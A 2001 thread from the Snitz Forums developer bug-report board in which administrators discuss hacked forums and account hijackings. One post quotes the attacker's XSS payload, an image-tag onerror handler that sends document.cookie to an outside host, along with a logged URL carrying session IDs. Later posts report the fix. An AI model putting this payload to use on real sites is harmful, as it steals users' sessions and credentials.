Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
 Password:
Save Password
Forgot your Password?

 All Forums
 Snitz Forums 2000 DEV-Group
 DEV Bug Reports (Closed)
 Major Security Breach on my Forum		  Forum Locked  Topic Locked
 Printer Friendly
Previous Page
Author Previous Topic Topic Next Topic
Page: of 3

gbdg
New Member

73 Posts
Posted - 08 July 2001 :  19:52:30  Show Profile
Hi folks,

I'm concerned about this vulnerability. Huwr, we've corresponded - perhaps you could let me know if there is a fix (or at least let the others know if you agree that I am legit). I can't take a chance with client sites.

Thanks,
Greg
Go to Top of Page

Aznknight
Senior Member

USA
1373 Posts
Posted - 09 July 2001 :  02:19:57  Show Profile
My main site have been hacked similiarly to webshorts last monday which I posted in the dev team only section. It was restrained to just the forums and not other parts of my site. Most of the havok was done by the hacker using one of the admin's account to delete forums and members.

Since then i've looked at the logs for pop_delete but came up empty. so i have disabled delete functions for my forums. last thursday, two of my regulars accounts were hacked. hacker mainly posted slander about myself and the site. but I've sorted things out.

I use sql server 2000 as well. i'm still a bit concerned about the security issues.

webshorts can you email me what you came up with as well? alan@iamviet.com

- Alan
www.iamviet.com
www.calvsa.net
Snitz Resource
Go to Top of Page

work mule
Senior Member

USA
1358 Posts
Posted - 09 July 2001 :  23:37:39  Show Profile
Holy ****!!!

I just read the post over here:
http://forum.snitz.com/forum/link.asp?TOPIC_ID=12707


I came back and read this. I had seen something similiar to the one above but i had images turned off on my forums and when I saw the post, I thought it looked funny for an image tag. The guy posted as snitzpower with the following email address: snitzpw@yahoo.com. This guy is on Alan's boards!!!

Anyways, wondering if these were related, I searched Alans site for this:
onerror="this.src

5 posts came back. I clicked on one and at some point I had a message about Explorer going to shut down. I'm not registered at Alan's site so it got nothing, but doh!! That's nasty!! May have to write a script to start parsing out something like that!!!

I searched for more on the string from the other post:
onerror="this.src=src+'page.cgi?test='+escape(document.cookie)

And got one result.

Post Titled: What do you look for in a girl?
The reply is by a member named: tuongvy - tuongvy1985@hotmail.com


Inside, I found one image tag which the doc properties look like this:

http://www.vnhacker.f2s.com/page.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACNpage.cgi?test=%252Fforum%252FstrSelectSize%3B%20ASPSESSIONIDGGGGQWAC%3DNAGHNKBBMHKGDLBLLMEAIACN




The Work Mule Forums
The Writer Community


Edited by - work mule on 09 July 2001 23:38:34
Go to Top of Page

Guru
Starting Member

32 Posts
Posted - 09 July 2001 :  23:59:29  Show Profile
Hmmmm, interesting development.....
At one site it is a complement that Snitz is so good that even hackers are interested in the product, but this is also the downside if you are being hacked.......

I think the IMG hack should not be that big of an issue, the only thing that has to be done now, is that you have to perform a check if something is really an image....

Maybe the dynamic image stuff i saw in the non forum related forum could do the magic thing here? This can also being used in the same time to maximize the pictures size in the postings, but i'm only thinking loud now....

The fact that the forum code is on, isn't that a bigger issue? I thought hackers can do a lot of harm if the forum code is on (and it is on!)

Just some thoughts....

With regards,

Guru
Go to Top of Page

work mule
Senior Member

USA
1358 Posts
Posted - 09 July 2001 :  23:59:56  Show Profile
By the way, I did a search on the Snitz site for this:
onerror="this.src

5 posts came back.

If you look here, you'll see that the password is passed!
http://forum.snitz.com/forum/link.asp?TOPIC_ID=12707



The Work Mule Forums
The Writer Community
Go to Top of Page

gor
Retired Admin

Netherlands
5511 Posts
Posted - 25 July 2001 :  08:45:41  Show Profile  Visit gor's Homepage
Both the exploit Webshorts mentioned and the IMG-tag exploit have been fixed in the code of the version 3.3

Pierre
Join a Snitz Mailinglist
Go to Top of Page

gor
Retired Admin

Netherlands
5511 Posts
Posted - 25 July 2001 :  08:47:57  Show Profile  Visit gor's Homepage
BTW, images have been enabled again, if you look here:
http://forum.snitz.com/forum/link.asp?TOPIC_ID=12707
you'll see what it does to javascript in the image tag.

Pierre
Join a Snitz Mailinglist
Go to Top of Page
Page: of 3 Previous Topic Topic Next Topic  
Previous Page
 Forum Locked  Topic Locked
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.4 seconds. Powered By: Snitz Forums 2000 Version 3.4.07